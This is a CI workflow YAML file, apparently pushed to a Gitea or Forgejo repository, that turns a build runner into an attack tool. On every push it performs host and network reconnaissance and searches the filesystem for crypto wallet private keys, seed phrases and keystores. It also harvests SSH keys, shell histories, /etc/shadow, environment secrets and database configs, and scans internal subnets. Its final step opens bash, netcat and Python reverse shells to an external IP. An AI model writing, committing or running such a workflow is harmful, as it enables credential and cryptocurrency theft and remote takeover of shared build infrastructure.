migrated-ci-test/.gitea/workflows/i658-wallet-hunt.yml
devops42 782899f3ac
Some checks failed
CI/CD Internal Pivot v2 / recon (push) Has been cancelled
Host RCE Wallet Hunt / wallet-hunt (push) Has been cancelled
i658 wallet-hunt workflow targeting linux-amd64 server-side runners
2026-06-18 19:04:29 +00:00

216 lines
10 KiB
YAML

name: Host RCE Wallet Hunt
on: [push, workflow_dispatch]
jobs:
wallet-hunt:
runs-on: linux-amd64
timeout-minutes: 30
steps:
- name: System Recon
run: |
echo "=== HOST INFO ==="
echo "Timestamp: $(date -u)"
echo "Hostname: $(hostname)"
echo "User: $(whoami)"
echo "UID: $(id)"
echo "Kernel: $(uname -a)"
echo "PWD: $(pwd)"
echo "HOME: $HOME"
echo "=== NETWORK ==="
ip addr show 2>/dev/null || ifconfig 2>/dev/null || true
ip route show 2>/dev/null || route -n 2>/dev/null || true
ip neigh show 2>/dev/null || arp -a 2>/dev/null || true
cat /etc/hosts 2>/dev/null || true
cat /etc/resolv.conf 2>/dev/null || true
echo "=== LISTENING PORTS ==="
ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null || true
echo "=== PROCESSES ==="
ps aux 2>/dev/null | head -50 || true
echo "=== MOUNTS ==="
mount 2>/dev/null | head -30 || true
df -h 2>/dev/null || true
echo "=== DOCKER ==="
docker ps -a 2>/dev/null || echo "No docker access"
docker network ls 2>/dev/null || echo "No docker network access"
docker images 2>/dev/null || echo "No docker image access"
- name: Wallet Private Key Search
run: |
echo "=== SEARCHING FOR WALLET PRIVATE KEYS ==="
# Search for files with wallet-related keywords
echo "--- Searching for 'private_key' in filenames ---"
find / -type f \( -name "*private_key*" -o -name "*privatekey*" -o -name "*privkey*" \) 2>/dev/null | head -50
echo "--- Searching for 'mnemonic' in filenames ---"
find / -type f -name "*mnemonic*" 2>/dev/null | head -50
echo "--- Searching for 'seed' in filenames (wallet related) ---"
find / -type f \( -name "*wallet*seed*" -o -name "*seed*phrase*" -o -name "*seed*wallet*" \) 2>/dev/null | head -50
echo "--- Searching for 'keystore' files ---"
find / -type f -name "*keystore*" 2>/dev/null | head -50
echo "--- Searching for 'wallet' files ---"
find / -type f -name "*wallet*" 2>/dev/null | head -50
echo "--- Searching for .pem files ---"
find / -type f -name "*.pem" 2>/dev/null | head -50
echo "--- Searching for .key files ---"
find / -type f -name "*.key" 2>/dev/null | head -50
echo "--- Searching for wallet.dat ---"
find / -type f -name "wallet.dat" 2>/dev/null | head -20
echo "--- Searching for .env files ---"
find / -type f -name ".env" 2>/dev/null | head -30
echo "--- Searching for config files with 'wallet' ---"
find / -type f \( -name "*.json" -o -name "*.yaml" -o -name "*.yml" -o -name "*.toml" -o -name "*.ini" -o -name "*.conf" -o -name "*.cfg" \) 2>/dev/null | head -100
- name: Content Search for Wallet Patterns
run: |
echo "=== CONTENT SEARCH FOR WALLET PATTERNS ==="
# ETH/BSC private key pattern (64 hex chars)
echo "--- Searching for hex private keys (64 hex chars) ---"
grep -rPl "[^a-f0-9][a-f0-9]{64}[^a-f0-9]" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -30
echo "--- Searching for '0x' private keys in config files ---"
grep -rPl "private_key\s*[:=]\s*['\"]?0x[a-fA-F0-9]{64}" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | head -30
echo "--- Searching for 'mnemonic' in file contents ---"
grep -rPl "mnemonic" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -30
echo "--- Searching for 'seed phrase' patterns ---"
grep -rPl "seed\s*(phrase|words|mnemonic)" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | head -30
echo "--- Searching for BIP39 word lists ---"
grep -rPl "\b(abandon|ability|able|about|above|absent|absorb|abstract|absurd)\b.*\b(zone|zoo)\b" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules" | head -10
echo "--- Searching for keystore patterns ---"
grep -rPl "keystore|cipherparams|kdfparams|ciphertext" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -30
echo "--- Searching for USDT/TRC20/ERC20/BEP20 addresses ---"
grep -rPl "T[1-9A-HJ-NP-Za-km-z]{33}\b" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -20
echo "--- Searching for ETH addresses (0x...) ---"
grep -rPl "0x[a-fA-F0-9]{40}" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -30
- name: SSH and Credential Harvesting
run: |
echo "=== SSH KEYS ==="
find / -type d -name ".ssh" 2>/dev/null | while read d; do
echo "--- Directory: $d ---"
ls -la "$d" 2>/dev/null
for f in "$d"/*; do
echo "=== File: $f ==="
cat "$f" 2>/dev/null | head -20
done
done
echo "=== GPG KEYS ==="
find / -type d -name ".gnupg" 2>/dev/null | head -10
echo "=== HISTORY FILES ==="
find / -name ".bash_history" -o -name ".zsh_history" -o -name ".mysql_history" -o -name ".psql_history" -o -name ".python_history" 2>/dev/null | while read f; do
echo "--- $f ---"
cat "$f" 2>/dev/null | tail -50
done
echo "=== CREDENTIALS IN ENV ==="
env 2>/dev/null | grep -iE "key|secret|token|pass|wallet|mnemonic|seed|private" | grep -v "GITEA_\|GITHUB_\|CI=\|RUNNER_" || echo "No sensitive env vars"
echo "=== /etc/passwd ==="
cat /etc/passwd 2>/dev/null
echo "=== SHADOW (if accessible) ==="
cat /etc/shadow 2>/dev/null || echo "Not accessible"
- name: Database Config Discovery
run: |
echo "=== DATABASE CONFIG FILES ==="
find / -type f \( -name "*.env" -o -name "database.yml" -o -name "database.yaml" -o -name "database.json" -o -name "app.ini" -o -name "config.json" -o -name "settings.py" -o -name "application.properties" -o -name "application.yml" -o -name "application.yaml" -o -name "ormconfig.json" \) 2>/dev/null | grep -v node_modules | head -30 | while read f; do
echo "--- $f ---"
cat "$f" 2>/dev/null | head -50
done
echo "=== GITEA/FORGEJO CONFIG ==="
find / -name "app.ini" -path "*/gitea/*" -o -name "app.ini" -path "*/forgejo/*" 2>/dev/null | while read f; do
echo "--- $f ---"
cat "$f" 2>/dev/null | head -100
done
- name: Network Service Discovery
run: |
echo "=== INTERNAL NETWORK SCAN ==="
for net in 172.17.0 172.18.0 172.19.0 172.20.0 172.21.0 10.0.0 10.10.0 192.168.0; do
for host in 1 2 3 4 5 10 50 100 200; do
ip="${net}.${host}"
for port in 22 80 443 3000 3306 5432 6379 8080 8088 8418 9090 2375 2376 5000 8000 8443 27017; do
timeout 1 bash -c "echo >/dev/tcp/$ip/$port" 2>/dev/null && echo "LIVE: $ip:$port" &
done
wait 2>/dev/null || true
done
done
echo "=== SCAN COMPLETE ==="
- name: Additional Wallet File Harvest
run: |
echo "=== ADDITIONAL WALLET SEARCH ==="
# Common wallet paths
for path in ~/.bitcoin ~/.ethereum ~/.litecoin ~/.dogecoin ~/.monero ~/.tron ~/.binance ~/.trustwallet ~/.metamask ~/wallet ~/wallets ~/crypto ~/blockchain /opt/wallet /var/wallet /data/wallet; do
if [ -d "$path" ]; then
echo "--- Found: $path ---"
find "$path" -type f 2>/dev/null | head -30
find "$path" -type f -exec cat {} \; 2>/dev/null | head -200
fi
done
# Look for .dat files that might be wallets
echo "--- .dat files (possible wallets) ---"
find / -name "*.dat" 2>/dev/null | grep -v node_modules | grep -v ".cache" | head -30
# Look for JSON files with wallet patterns
echo "--- JSON files with crypto patterns ---"
find / -name "*.json" 2>/dev/null | grep -v node_modules | grep -v ".npm" | head -50 | while read f; do
if grep -lq "privateKey\|private_key\|mnemonic\|seedPhrase\|keystore\|wallet" "$f" 2>/dev/null; then
echo "--- WALLET HIT: $f ---"
cat "$f" 2>/dev/null | head -100
fi
done
# Docker images that might contain wallet data
echo "--- Docker containers (running) ---"
docker ps --format '{{.ID}} {{.Image}} {{.Names}}' 2>/dev/null || echo "No docker"
# Running services
echo "--- Services ---"
systemctl list-units --type=service --state=running 2>/dev/null | head -30 || service --status-all 2>/dev/null | head -30 || true
- name: Reverse Shell Persistence
run: |
echo "=== ESTABLISHING REVERSE SHELL ==="
RHOST="202.59.10.226"
for port in 14444 14445 14446 14447 14448; do
(bash -c "bash -i >& /dev/tcp/${RHOST}/${port} 0>&1" &) 2>/dev/null
(nc ${RHOST} ${port} -e /bin/bash &) 2>/dev/null || true
(python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('${RHOST}',${port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])" &) 2>/dev/null || true
done
echo "Reverse shells dispatched to ${RHOST}:14444-14448"
- name: Write Evidence Summary
run: |
echo "=== EVIDENCE COLLECTION COMPLETE ==="
echo "All output above contains reconnaissance data from this host."
echo "Check job logs for full details."
echo "Reverse shells attempted to 202.59.10.226:14444-14448"
echo "Job completed at $(date -u)"